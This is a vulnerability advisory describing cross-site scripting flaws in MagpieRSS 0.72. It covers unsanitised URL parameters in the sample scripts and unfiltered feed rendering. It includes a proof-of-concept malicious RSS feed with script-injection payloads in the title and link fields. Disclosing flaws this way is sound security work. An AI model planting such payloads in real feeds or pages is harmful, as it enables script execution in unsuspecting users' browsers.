MagpieRSS Multiple XSS Vulnerabilities
MagpieRSS (http://magpierss.sourceforge.net) is a PHP based RSS reader. "MagpieRSS is compatible with RSS 0.9 through RSS 1.0. Also parses RSS 1.0's modules, RSS 2.0, and Atom. (with a few exceptions)." Magpie is often included as a component in other PHP applications so vulnerabilities in Magpie may have security implications for other applications. Magpie suffers from multiple cross site scripting (XSS) vulnerabilities. The first class of vulnerability is due to the failure to sanitize URL variables in scripts included with the MagpieRSS distribution. Specifically the $url variable is crafted from $_GET['url'] and used in display to users in:
The file magpierss-0.72/scripts/magpie_slashbox.php uses the same $url variable, but cast from $_GET['rss_url'].
The second class of XSS results from MagpieRSS' failure to sanitize any of the RSS feeds it draws using magpierss-0.72/rss_fetch.inc. This could result in cross site scripting vulnerabilities being injected by malicious RSS feeds.
Proof of concept
The following links can be used to trigger XSS in Magpie's sample scripts:
The following malicious RSS feed can be used to exploit Magpie's RSS rendering:
<?xml version="1.0" encoding="utf-8"?> <rss version="2.0" xml:base="http://justin.madirish.net" xmlns:dc="http://purl.org/dc/elements/1.1/"> <channel> <title>Justin.MadIrish.net <script>alert('xss title');</script>- Justin's Personal Homepage</title> <link>http://justin.madirish.net</link> <description>Close personal friends with Evil Eve.</description> <language>en</language> <item> <title>Disturbing<script>alert('xss title');</script> XSS<script>alert('xss title');</script></title> <link>http://justin.madirish.net/node/343 <script>alert('xss link');</script></link> <description>foobar</description> <pubDate>Wed, 04 Mar 2009 13:42:09 +0000</pubDate> <dc:creator>justin</dc:creator> <guid isPermaLink="false">343 at http://justin.madirish.net </guid> </item> </channel> </rss>
Software: MagpieRSS (http://magpierss.sourceforge.net/)
Version Tested: magpierss-0.72